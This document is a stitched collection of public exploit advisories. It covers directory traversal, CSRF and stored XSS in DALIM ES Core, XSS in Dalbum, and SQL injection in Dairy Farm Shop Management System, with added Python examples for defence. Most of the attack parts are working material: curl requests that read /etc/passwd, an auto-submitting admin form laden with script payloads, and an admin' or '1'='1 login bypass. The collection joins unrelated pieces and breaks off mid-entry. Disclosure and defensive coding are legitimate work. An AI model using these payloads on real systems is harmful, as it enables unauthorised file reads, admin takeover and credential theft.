DALIM SOFTWARE ES Core 5.0 build 7184.1 Multiple Remote File Disclosures
Vendor: Dalim Software GmbH
Product web page: https://www.dalim.com
Affected version: ES/ESPRiT 5.0 (build 7184.1)
(build 7163.2)
(build 7163.0)
(build 7135.0)
(build 7114.1)
(build 7114.0)
(build 7093.1)
(build 7093.0)
(build 7072.0)
(build 7051.3)
(build 7051.1)
(build 7030.0)
(build 7009.0)
(build 6347.0)
(build 6326.0)
(build 6305.1)
(build 6235.9)
(build 6172.1)
ES/ESPRiT 4.5 (build 6326.0)
(build 6144.2)
(build 5180.2)
(build 5096.0)
(build 4314.3)
(build 4314.0)
(build 4146.4)
(build 3308.3)
ES/ESPRiT 4.0 (build 4202.0)
(build 4132.1)
(build 2235.0)
ES/ESPRiT 3.0
Summary: ES is the new Enterprise Solution from DALIM SOFTWARE built
from the successful TWIST, DIALOGUE and MISTRAL product lines. The ES
Core is the engine that can handle project tracking, JDF device workflow,
dynamic user interface building, volume management. Each ES installation
will have different features, depending on the license installed: online
approval, prepress workflow, project tracking, imposition management...
ES is a collaborative digital asset production and management platform,
offering services ranging from online approval to web-based production
environment for all participants of the production cycle, including brand
owners, agencies, publishers, pre-media, printers and multichannel service
providers. ES lets users plan, execute and control any aspect of media
production, regardless of the final use of the output (print, web, ebook,
movie, and others). It ensures productivity and long-term profitability.
Desc: Input passed through several parameters is not properly verified before
being used to read files. This can be exploited by an unauthenticated
attacker to read arbitrary files from local resources via directory
traversal.
Tested on: Red Hat Enterprise Linux Server release 7.3 (Maipo)
CentOS 7
Apache Tomcat/7.0.78
Apache Tomcat/7.0.67
Apache Tomcat/7.0.42
Apache Tomcat/6.0.35
Apache-Coyote/1.1
Java/1.7.0_80
Java/1.6.0_21
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5427
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5427.php
15.06.2017
--
---------------------------------------------------
1. PoC request for Password.jsp, orgName parameter:
---------------------------------------------------
~ curl -v http://TARGET:8080/Esprit/public/Password.jsp\?orgName\=../../../../../../../../../etc/passwd
* Trying TARGET...
* TCP_NODELAY set
* Connected to TARGET (TARGET) port 8080 (#0)
> GET /Esprit/public/Password.jsp?orgName=../../../../../../../../../etc/passwd HTTP/1.1
> Host: TARGET:8080
> User-Agent: curl/7.51.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Content-Type: text/html;charset=UTF-8
< Transfer-Encoding: chunked
< Date: Thu, 15 Jun 2017 02:18:44 GMT
< Server: Server
<
--snip--
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
--snip--
----------------------------------------------------
2. PoC request for Login.jsp, orgUnitName parameter:
----------------------------------------------------
~ curl -v http://TARGET/Esprit/ES/Login\?orgUnitName\=../../../../../../../../../etc/passwd
* Trying TARGET...
* TCP_NODELAY set
* Connected to TARGET (TARGET) port 80 (#0)
> GET /Esprit/ES/Login?orgUnitName=../../../../../../../../../etc/passwd HTTP/1.1
> Host: TARGET
> User-Agent: curl/7.51.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Thu, 15 Jun 2017 02:19:31 GMT
< Server: Server
< Content-Type: text/html;charset=UTF-8
< Set-Cookie: JSESSIONID=0ECF83AA0D337B5D942B5C164B172051; Path=/Esprit; HttpOnly
< Transfer-Encoding: chunked
<
--snip--
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
--snip--
---------------------------------------
3. PoC request for log, file parameter:
---------------------------------------
~ curl http://TARGET:8080/dalimws/log\?file\=../../../../../../../etc/passwd\&len\=10000\&download\=true -v
* Trying TARGET...
* TCP_NODELAY set
* Connected to TARGET (TARGET) port 8080 (#0)
> GET /dalimws/log?file=../../../../../../../etc/passwd&len=10000&download=true HTTP/1.1
> Host: TARGET:8080
> User-Agent: curl/7.51.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Content-Disposition: attachment; filename=../../../../../../../etc/passwd
< Content-Type: text/plain
< Content-Length: 10000
< Date: Thu, 15 Jun 2017 02:20:17 GMT
< Server: Server
<
--snip--
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
--snip--
---------------------------------------
4. PoC request for log, file parameter:
---------------------------------------
POST /dalimws/log HTTP/1.1
Host: TARGET:8080
Content-Length: 116
User-Agent: H2O
Content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Language: en-US,en;q=0.8,mk;q=0.6
Connection: close
file=../../../../../../../symlnks/common/tomcat7.0/conf/web.xml&len=1000000&XUI_SessionID=LOGReq&responseWiter=XML
Response:
--snip--
<!-- The mapping for the default servlet -->
<servlet-mapping>
<servlet-name>default</servlet-name>
<url-pattern>/</url-pattern>
</servlet-mapping>
<!-- The mappings for the JSP servlet -->
<servlet-mapping>
<servlet-name>jsp</servlet-name>
<url-pattern>*.jsp</url-pattern>
<url-pattern>*.jspx</url-pattern>
</servlet-mapping>
--snip--
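The four requests above all share one root cause: a file name taken from a request parameter is handed to the file system without being anchored to a base directory. The following is an added example, not DALIM's code, of the two things a defender wants here: a resolver that canonicalises the requested name under a fixed directory and refuses anything that escapes it, and a check over web-server access-log lines that flags the request shape the PoCs use, including URL-encoded and double-encoded variants. The base directory `/srv/dalim/logs`, the log lines and the client addresses are constructed; only the request paths are taken from the advisory.

```python
"""Added example (not DALIM's code): a traversal-safe resolver for a user-supplied
file name, plus a check over access-log lines for the request shape the PoCs use."""
import os
import re
from typing import List, Optional
from urllib.parse import unquote


def resolve_under_base(base_dir: str, requested: str) -> Optional[str]:
    """Map `requested` (a parameter value as the web framework delivered it, i.e.
    already URL-decoded once) onto base_dir. Returns the canonical absolute path,
    or None when the result would be base_dir itself or anything outside it."""
    if "\x00" in requested:          # realpath would raise on an embedded NUL
        return None
    base = os.path.realpath(base_dir)
    # os.path.join drops `base` when `requested` is absolute, and realpath collapses
    # "..", so "/etc/passwd" and "../../etc/passwd" both land outside `base`.
    candidate = os.path.realpath(os.path.join(base, requested))
    # commonpath rather than startswith: "/srv/logs" must not accept "/srv/logs-old/x".
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


# Constructed access-log lines (Common Log Format). The request paths are the
# advisory's own PoC paths; the client addresses, timestamps and sizes are made up.
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [15/Jun/2017:02:18:44 +0000] "GET /Esprit/public/Password.jsp?orgName=../../../../../../../../../etc/passwd HTTP/1.1" 200 1834',
    '203.0.113.7 - - [15/Jun/2017:02:20:17 +0000] "GET /dalimws/log?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&len=10000&download=true HTTP/1.1" 200 10000',
    '203.0.113.7 - - [15/Jun/2017:02:20:40 +0000] "GET /dalimws/log?file=%252e%252e%252fetc%252fpasswd&len=10000 HTTP/1.1" 200 10000',
    '198.51.100.2 - - [15/Jun/2017:02:21:00 +0000] "GET /dalimws/log?file=catalina.out&len=1000 HTTP/1.1" 200 1000',
]

REQUEST_LINE_RE = re.compile(r'"(?:GET|POST|HEAD|PUT)\s+(\S+)')
# ".." as a whole path segment: at the start, after a slash/backslash, or right
# after a query key ("file=../").
DOTDOT_SEGMENT_RE = re.compile(r"(?:^|[/\\=&])\.\.(?:[/\\]|$)")


def is_traversal_request(log_line: str) -> bool:
    """True when the request target contains a ".." segment after decoding."""
    m = REQUEST_LINE_RE.search(log_line)
    if not m:
        return False
    # Access logs record the raw request line, so decode here; decode twice so a
    # double-encoded "%252e%252e%252f" is inspected as "../" as well.
    target = unquote(unquote(m.group(1)))
    return bool(DOTDOT_SEGMENT_RE.search(target))


def flag_traversal(lines: List[str]) -> List[str]:
    """Return the subset of log lines that look like traversal attempts."""
    return [line for line in lines if is_traversal_request(line)]


if __name__ == "__main__":
    for name in ("catalina.out", "../../../../../../../etc/passwd", "/etc/passwd"):
        print(f"{name!r:45} -> {resolve_under_base('/srv/dalim/logs', name)}")
    for line in flag_traversal(SAMPLE_ACCESS_LOG):
        print("flagged:", line)
```

Two details worth carrying over to a real fix: the resolver does not URL-decode, because a servlet container has already decoded the parameter once and decoding again is how double-encoding bypasses get introduced; and the `Content-Disposition` header in PoC 3 echoes the raw `file` value, so a download endpoint should build that header from `os.path.basename(candidate)`, never from the parameter.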
<!--
DALIM SOFTWARE ES Core 5.0 build 7184.1 Multiple Stored XSS And CSRF Vulnerabilities
Vendor: Dalim Software GmbH
Product web page: https://www.dalim.com
Affected version: ES/ESPRiT 5.0 (build 7184.1)
(build 7163.2)
(build 7163.0)
(build 7135.0)
(build 7114.1)
(build 7114.0)
(build 7093.1)
(build 7093.0)
(build 7072.0)
(build 7051.3)
(build 7051.1)
(build 7030.0)
(build 7009.0)
(build 6347.0)
(build 6326.0)
(build 6305.1)
(build 6235.9)
(build 6172.1)
ES/ESPRiT 4.5 (build 6326.0)
(build 6144.2)
(build 5180.2)
(build 5096.0)
(build 4314.3)
(build 4314.0)
(build 4146.4)
(build 3308.3)
ES/ESPRiT 4.0 (build 4202.0)
(build 4132.1)
(build 2235.0)
ES/ESPRiT 3.0
Summary: ES is the new Enterprise Solution from DALIM SOFTWARE built
from the successful TWIST, DIALOGUE and MISTRAL product lines. The ES
Core is the engine that can handle project tracking, JDF device workflow,
dynamic user interface building, volume management. Each ES installation
will have different features, depending on the license installed: online
approval, prepress workflow, project tracking, imposition management...
ES is a collaborative digital asset production and management platform,
offering services ranging from online approval to web-based production
environment for all participants of the production cycle, including brand
owners, agencies, publishers, pre-media, printers and multichannel service
providers. ES lets users plan, execute and control any aspect of media
production, regardless of the final use of the output (print, web, ebook,
movie, and others). It ensures productivity and long-term profitability.
Desc: The application allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site. XSS issues
were also discovered. The issue is triggered when unauthorized input
passed via multiple POST and GET parameters is not properly sanitized
before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in the context
of an affected site.
Tested on: Red Hat Enterprise Linux Server release 7.3 (Maipo)
CentOS 7
Apache Tomcat/7.0.78
Apache Tomcat/7.0.67
Apache Tomcat/7.0.42
Apache Tomcat/6.0.35
Apache-Coyote/1.1
Java/1.7.0_80
Java/1.6.0_21
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5426
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5426.php
15.06.2017
-->
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://TARGET:8080/dalimws/admin" method="POST">
<input type="hidden" name="Prop/DeviceName" value="TESTHOST</script><script>alert(1)</script>" />
<input type="hidden" name="Prop_DeviceName_edit" value="TESTHOST" />
<input type="hidden" name="Prop/DeviceID" value="WebService-2510717331</script><script>alert(2)</script>" />
<input type="hidden" name="Prop_DeviceID_edit" value="WebService-2510717331" />
<input type="hidden" name="Prop/QueueCapacity" value="-1</script>script>alert(3)</script>" />
<input type="hidden" name="Prop_QueueCapacity_edit" value="-1" />
<input type="hidden" name="Prop/AbortOnNothingDone" value="false" />
<input type="hidden" name="Prop/IgnoreNodeInfo" value="false" />
<input type="hidden" name="Prop/SecurityPassword" value="" />
<input type="hidden" name="Prop_SecurityPassword_edit" value="" />
<input type="hidden" name="Prop/QueueFolderPath" value="/symlnks/io/jobs/JDFDevice/queue</script><script>alert(4)</script>" />
<input type="hidden" name="Prop_QueueFolderPath_edit" value="/symlnks/io/jobs/JDFDevice/queue" />
<input type="hidden" name="Prop/PluginFolderPath" value="/symlnks/DALiM_6.0/jdfplugins" />
<input type="hidden" name="Prop_PluginFolderPath_edit" value="/symlnks/DALiM_6.0/jdfplugins</script><script>alert(5)</script>" />
<input type="hidden" name="Prop/HotFolderPath" value="/symlnks/io/jobs/JDFDevice/hotfolder</script><script>alert(6)</script>" />
<input type="hidden" name="Prop_HotFolderPath_edit" value="/symlnks/io/jobs/JDFDevice/hotfolder" />
<input type="hidden" name="Prop/DestinationFolderPath" value="/symlnks/io/jobs/JDFDevice/output" />
<input type="hidden" name="Prop_DestinationFolderPath_edit" value="/symlnks/io/jobs/JDFDevice/output</script><script>alert(7)</script>" />
<input type="hidden" name="Prop/ControllerURL" value="http://TESTHOST:8080/dalimws/controller</script><script>alert(8)</script>" />
<input type="hidden" name="Prop_ControllerURL_edit" value="http://TESTHOST:8080/dalimws/controller" />
<input type="hidden" name="Prop_DBSettings_edit" value="" />
<input type="hidden" name="Prop/DBSettings" value="" />
<input type="hidden" name="Prop/JDBC_Driver" value="org.hsqldb.jdbcDriver</script><script>alert(9)</script>" />
<input type="hidden" name="Prop_JDBC_Driver_edit" value="org.hsqldb.jdbcDriver" />
<input type="hidden" name="Prop/JDBC_URL" value="jdbc:hsqldb:/symlnks/io/jobs/JDFDevice/queue/QueueDB" />
<input type="hidden" name="Prop_JDBC_URL_edit" value="jdbc:hsqldb:/symlnks/io/jobs/JDFDevice/queue/QueueDB" />
<input type="hidden" name="Prop/JDBC_User" value="SA" />
<input type="hidden" name="Prop_JDBC_User_edit" value="SA" />
<input type="hidden" name="Prop/JDBC_Password" value="null" />
<input type="hidden" name="Prop_JDBC_Password_edit" value="null" />
<input type="hidden" name="Prop_LogLevel_edit" value="Information" />
<input type="hidden" name="Prop/LogLevel" value="INFO" />
<input type="hidden" name="Prop_LogFiles_edit" value="stdout.log" />
<input type="hidden" name="Prop/LogFiles" value="stdout.log" />
<input type="hidden" name="Prop/LogContent" value="" />
<input type="hidden" name="Prop_LogContent_edit" value="" />
<input type="hidden" name="com/dalim/esprit/devices/imageserverpreview/ImageServerPreview/CacheSize" value="1000" />
<input type="hidden" name="com_dalim_esprit_devices_imageserverpreview_ImageServerPreview_CacheSize_edit" value="1000" />
<input type="hidden" name="com/dalim/esprit/devices/imageserverpreview/ImageServerPreview/CacheFolder" value="/symlnks/io/jobs/dialogue/cache" />
<input type="hidden" name="com_dalim_esprit_devices_imageserverpreview_ImageServerPreview_CacheFolder_edit" value="/symlnks/io/jobs/dialogue/cache" />
<input type="hidden" name="com_dalim_esprit_devices_imageserverpreview_ImageServerPreview_TextExtractionVersion_edit" value="2" />
<input type="hidden" name="com/dalim/esprit/devices/imageserverpreview/ImageServerPreview/TextExtractionVersion" value="2" />
<input type="hidden" name="com/dalim/jdf/process/plugin/twist/TwistPlugin/TwistGate" value="TWIST7-1" />
<input type="hidden" name="com_dalim_jdf_process_plugin_twist_TwistPlugin_TwistGate_edit" value="TWIST7-1" />
<input type="hidden" name="com/dalim/jdf/process/plugin/twist/TwistPlugin/GatePort" value="6042" />
<input type="hidden" name="com_dalim_jdf_process_plugin_twist_TwistPlugin_GatePort_edit" value="6042" />
<input type="hidden" name="com/dalim/jdf/process/plugin/twist/TwistPlugin/DirectFileIO" value="false" />
<input type="hidden" name="com/dalim/esprit/devices/ddms/cylindermontage/CylinderMontageProcess/fontRegistrationURL" value="" />
<input type="hidden" name="com_dalim_esprit_devices_ddms_cylindermontage_CylinderMontageProcess_fontRegistrationURL_edit" value="" />
<input type="hidden" name="com/dalim/esprit/devices/ddms/cylindermontage/CylinderMontageProcess/jdfProviderURL" value="" />
<input type="hidden" name="com_dalim_esprit_devices_ddms_cylindermontage_CylinderMontageProcess_jdfProviderURL_edit" value="" />
<input type="hidden" name="com/dalim/esprit/devices/ddms/cylindermontage/CylinderMontageProcess/layoutFolder" value="false" />
<input type="hidden" name="com_dalim_esprit_devices_ddms_cylindermontage_CylinderMontageProcess_layoutFolder_edit" value="false" />
<input type="hidden" name="com/dalim/esprit/devices/ddms/cylindermontage/CylinderMontageProcess/markFolder" value="" />
<input type="hidden" name="com_dalim_esprit_devices_ddms_cylindermontage_CylinderMontageProcess_markFolder_edit" value="" />
<input type="hidden" name="com/dalim/esprit/devices/ddms/cylindermontage/CylinderMontageProcess/markTmp" value="" />
<input type="hidden" name="com_dalim_esprit_devices_ddms_cylindermontage_CylinderMontageProcess_markTmp_edit" value="" />
<input type="hidden" name="com/dalim/devices/archiverestore/ArchivePlugin/P5Server" value="127.0.0.1" />
<input type="hidden" name="com_dalim_devices_archiverestore_ArchivePlugin_P5Server_edit" value="127.0.0.1" />
<input type="hidden" name="com/dalim/devices/archiverestore/ArchivePlugin/P5ServerPort" value="8000" />
<input type="hidden" name="com_dalim_devices_archiverestore_ArchivePlugin_P5ServerPort_edit" value="8000" />
<input type="hidden" name="com/dalim/devices/archiverestore/ArchivePlugin/P5User" value="super" />
<input type="hidden" name="com_dalim_devices_archiverestore_ArchivePlugin_P5User_edit" value="super" />
<input type="hidden" name="com/dalim/devices/archiverestore/ArchivePlugin/P5Password" value="super" />
<input type="hidden" name="com_dalim_devices_archiverestore_ArchivePlugin_P5Password_edit" value="super" />
<input type="hidden" name="com/dalim/devices/archiverestore/ArchivePlugin/P5Client" value="" />
<input type="hidden" name="com_dalim_devices_archiverestore_ArchivePlugin_P5Client_edit" value="" />
<input type="hidden" name="com/dalim/jdf/process/plugin/fileinput/FileInputPlugin/HotfolderLogging" value="false" />
<input type="hidden" name="com/dalim/jdf/process/plugin/fileinput/FileInputPlugin/FtpPort" value="" />
<input type="hidden" name="com_dalim_jdf_process_plugin_fileinput_FileInputPlugin_FtpPort_edit" value="" />
<input type="hidden" name="com/dalim/jdf/process/plugin/fileinput/FileInputPlugin/FtpDataRoot" value="/symlnks/io/jobs/ftpd/data" />
<input type="hidden" name="com_dalim_jdf_process_plugin_fileinput_FileInputPlugin_FtpDataRoot_edit" value="/symlnks/io/jobs/ftpd/data" />
<input type="hidden" name="com/dalim/jdf/process/plugin/fileinput/FileInputPlugin/FtpwatcherRoot" value="/symlnks/io/jobs/ftpwatcher" />
<input type="hidden" name="com_dalim_jdf_process_plugin_fileinput_FileInputPlugin_FtpwatcherRoot_edit" value="/symlnks/io/jobs/ftpwatcher" />
<input type="hidden" name="com/dalim/jdf/process/plugin/fileinput/FileInputPlugin/FtpwatcherLogging" value="false" />
<input type="hidden" name="com/dalim/jdf/process/plugin/fileinput/FileInputPlugin/MailwatcherRoot" value="/symlnks/io/jobs/mailwatcher" />
<input type="hidden" name="com_dalim_jdf_process_plugin_fileinput_FileInputPlugin_MailwatcherRoot_edit" value="/symlnks/io/jobs/mailwatcher" />
<input type="hidden" name="com/dalim/jdf/process/plugin/fileinput/FileInputPlugin/FilemonitorRoot" value="" />
<input type="hidden" name="com_dalim_jdf_process_plugin_fileinput_FileInputPlugin_FilemonitorRoot_edit" value="" />
<input type="hidden" name="com/dalim/jdf/process/plugin/fileinput/FileInputPlugin/FilemonitorBatchCount" value="1" />
<input type="hidden" name="com_dalim_jdf_process_plugin_fileinput_FileInputPlugin_FilemonitorBatchCount_edit" value="1" />
<input type="hidden" name="com_dalim_jdf_process_plugin_fileinput_FileInputPlugin_MetadataType_edit" value="DETAILED" />
<input type="hidden" name="com/dalim/jdf/process/plugin/fileinput/FileInputPlugin/MetadataType" value="DETAILED" />
<input type="hidden" name="com_dalim_jdf_process_plugin_fileinput_FileInputPlugin_DatabaseType_edit" value="hsqldb" />
<input type="hidden" name="com/dalim/jdf/process/plugin/fileinput/FileInputPlugin/DatabaseType" value="hsqldb" />
<input type="hidden" name="com/dalim/jdf/process/plugin/csconv/ColorSpaceConversionPlugin/BaseFolder" value="" />
<input type="hidden" name="com_dalim_jdf_process_plugin_csconv_ColorSpaceConversionPlugin_BaseFolder_edit" value="" />
<input type="hidden" name="com/dalim/jdf/process/plugin/csconv/ColorSpaceConversionPlugin/CheckInterval" value="-1" />
<input type="hidden" name="com_dalim_jdf_process_plugin_csconv_ColorSpaceConversionPlugin_CheckInterval_edit" value="-1" />
<input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/LogfileMaxSize" value="100M" />
<input type="hidden" name="com_dalim_jdf_plugin_etwist_server_ETwistServerPlugin_LogfileMaxSize_edit" value="100M" />
<input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/LogfileMaxCount" value="10" />
<input type="hidden" name="com_dalim_jdf_plugin_etwist_server_ETwistServerPlugin_LogfileMaxCount_edit" value="10" />
<input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/LogAddHD" value="false" />
<input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/LogIntoTomcatLog" value="false" />
<input type="hidden" name="com_dalim_jdf_plugin_etwist_server_ETwistServerPlugin_LoggingLevel_edit" value="INFO" />
<input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/LoggingLevel" value="INFO" />
<input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/ExtraServerLogging" value="false" />
<input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/ServerPort" value="6019" />
<input type="hidden" name="com_dalim_jdf_plugin_etwist_server_ETwistServerPlugin_ServerPort_edit" value="6019" />
<input type="hidden" name="com_dalim_jdf_plugin_etwist_server_ETwistServerPlugin_PublishWorkflows_edit" value="on" />
<input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/PublishWorkflows" value="true" />
<input type="hidden" name="com_dalim_jdf_plugin_etwist_server_ETwistServerPlugin_RetLogLocation_edit" value="JDFResult" />
<input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/RetLogLocation" value="JDFResult" />
<input type="hidden" name="com_dalim_jdf_plugin_etwist_server_ETwistServerPlugin_LogAlways_edit" value="on" />
<input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/LogAlways" value="true" />
<input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/MaxProcessCount" value="16" />
<input type="hidden" name="com_dalim_jdf_plugin_etwist_server_ETwistServerPlugin_MaxProcessCount_edit" value="16" />
<input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/MaxRunningProcessCount" value="16" />
<input type="hidden" name="com_dalim_jdf_plugin_etwist_server_ETwistServerPlugin_MaxRunningProcessCount_edit" value="16" />
<input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/HardworkerCount" value="2" />
<input type="hidden" name="com_dalim_jdf_plugin_etwist_server_ETwistServerPlugin_HardworkerCount_edit" value="2" />
<input type="hidden" name="com/dalim/jdf/plugin/etwist/server/ETwistServerPlugin/RepositoryUrl" value="http://localhost:8080/EspritEngine/JMFProcessor.html/servlet/etwistrepository" />
<input type="hidden" name="com_dalim_jdf_plugin_etwist_server_ETwistServerPlugin_RepositoryUrl_edit" value="http://localhost:8080/EspritEngine/JMFProcessor.html/servlet/etwistrepository" />
<input type="hidden" name="Prop/queueIsRunning" value="false" />
<input type="hidden" name="Prop/action" value="return" />
<input type="hidden" name="XUI_SessionID" value="admin976" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
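The form above works because the `/dalimws/admin` endpoint accepts any POST carrying a session cookie, with nothing in the request that a third-party page could not have supplied. What follows is an added example, not DALIM's code, of the check such an endpoint needs: a per-session synchronizer token that must be echoed back in the form, compared in constant time, plus a check that the browser-asserted `Origin` (or `Referer` as fallback) is the site's own. The deployment origin `http://es.example.internal:8080`, the session dictionary and the outside origin are assumed; the cross-site form values are the PoC's own.

```python
"""Added example (not DALIM's code): synchronizer-token plus Origin check for a
state-changing endpoint such as the /dalimws/admin POST above."""
import hmac
import secrets
from typing import Dict, Optional

# Assumed deployment origin of the application (the PoC form posts to TARGET:8080).
SITE_ORIGIN = "http://es.example.internal:8080"


def issue_csrf_token(session: Dict[str, str]) -> str:
    """Mint an unpredictable per-session token, keep it server-side, and embed the
    same value as a hidden field in every form the application renders."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def _is_own_origin(value: Optional[str]) -> bool:
    """True only for our origin, or a URL under it (the Referer case)."""
    if value is None:
        return False
    return value == SITE_ORIGIN or value.startswith(SITE_ORIGIN + "/")


def is_request_allowed(session: Dict[str, str], headers: Dict[str, str],
                       form: Dict[str, str]) -> bool:
    """Reject the POST unless (1) the hidden token matches the session's token and
    (2) the Origin header (or Referer, if Origin is absent) is our own site.
    A form hosted on another site carries neither."""
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token")
    if not expected or not supplied:
        return False
    # Constant-time comparison; compare bytes so non-ASCII input cannot raise.
    if not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False
    return _is_own_origin(headers.get("Origin") or headers.get("Referer"))


# Constructed request mirroring the PoC: the field values are the form's own,
# including the fixed "admin976" it submits as XUI_SessionID, and there is no token.
CROSS_SITE_FORM = {
    "Prop/DeviceName": "TESTHOST</script><script>alert(1)</script>",
    "Prop/action": "return",
    "XUI_SessionID": "admin976",
}
CROSS_SITE_HEADERS = {"Origin": "http://other-site.example"}


def demo() -> Dict[str, bool]:
    """Exercise the check against the PoC form and against a legitimate one."""
    session: Dict[str, str] = {}
    token = issue_csrf_token(session)
    own_form = {"Prop/DeviceName": "TESTHOST", "Prop/action": "return", "csrf_token": token}
    return {
        "cross_site_blocked": not is_request_allowed(session, CROSS_SITE_HEADERS, CROSS_SITE_FORM),
        "own_form_allowed": is_request_allowed(session, {"Origin": SITE_ORIGIN}, own_form),
        "token_but_wrong_origin_blocked": not is_request_allowed(session, CROSS_SITE_HEADERS, own_form),
        "origin_but_no_token_blocked": not is_request_allowed(session, {"Origin": SITE_ORIGIN}, {}),
    }


if __name__ == "__main__":
    print(demo())
```

The `XUI_SessionID` field in the PoC is not a substitute for the token: the PoC submits a fixed value for it, so it gives the server no evidence that the form came from its own page. Marking the `JSESSIONID` cookie `SameSite=Lax` in addition (the response in PoC 2 sets it with `HttpOnly` only) stops the browser from attaching the session to a cross-site POST in the first place.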
source: https://www.securityfocus.com/bid/47427/info
Dalbum is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Dalbum 1.43 is vulnerable; other versions may also be affected.
http://www.example.com/editini.php?album=/Sample%20album/&url=[xss]
# Exploit Title: Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass
# Date: 2021-09-30
# Exploit Author: sanjay singh
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/
# Version: v1.0
# Tested on: Windows 10
Steps-To-Reproduce:
Step 1 – Go to the admin panel login page at http://localhost/dfsms/index.php.
Step 2 – Enter anything in the username and password fields.
Step 3 – Click Login and capture the request in Burp Suite.
Step 4 – Change the username to admin' or '1'='1 and the password to dfsms.
Step 5 – Click Forward; you are now logged in as admin.
POC
POST /dfsms/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Origin: http://localhost
Connection: close
Referer: http://localhost/dfsms/index.php
Cookie: PHPSESSID=hgjvarn4tie1nmsufdn8mf1hrl
Upgrade-Insecure-Requests: 1
username=admin%27+or+%271%27%3D%271&password=dfsms&login=
# Exploit Title: Dairy Farm Shop Management System 1.0 - 'username' SQL Injection
# Google Dork: N/A
# Date: 2020-01-03
# Exploit Author: Chris Inzinga
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/
# Version: v1.0
# Tested on: Windows
# CVE: N/A
# The Dairy Farm Shop Management System 1.0 web application is vulnerable to
# SQL injection in multiple areas. The most severe of these is the username
# parameter on the login page as this injection can be done unauthenticated.
================================ 'username' - SQLi ================================
POST /dfsms/index.php HTTP/1.1
Host: 192.168.0.33
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.33/dfsms/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Connection: close
Cookie: PHPSESSID=ogvk4oricas9oudnb7hb88kgjg
Upgrade-Insecure-Requests: 1
username=test&password=test&login=
---
Parameter: username (POST)
Type: time-based blind
